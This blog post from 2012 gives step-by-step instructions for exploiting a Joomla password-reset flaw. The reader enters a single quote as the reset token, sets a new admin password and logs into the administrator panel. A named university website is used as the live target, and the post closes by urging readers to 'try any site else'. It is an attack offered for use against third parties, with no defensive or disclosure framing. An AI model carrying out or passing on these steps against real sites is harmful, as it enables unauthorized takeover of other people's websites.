Search This Blog

Saturday, June 2, 2012

Joomla Password Reset vulnerability



86d1be909ee2523009c60b5e699006d7d6d4f8bf_large.jpg (600×600)Joomla Password Reset vulnerability : Explain with Live demo : 

website  : http://miit.unikl.edu.my/ 


The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,


2. Now, put a single quote ' into field text box "token" and Click OK.


The sql query then will be looks like this :
"SELECT id FROM jos_users WHERE block = 0 AND activation = '' "

3. Write new password for admin
4. Go to url : http://miit.unikl.edu.my/administrator/
5. Login admin with your new password

** update: miit joomla was patched.. Try any site else

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo
Posted by Vishal S Sangwa at 6/02/2012 12:39:00 PM
Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)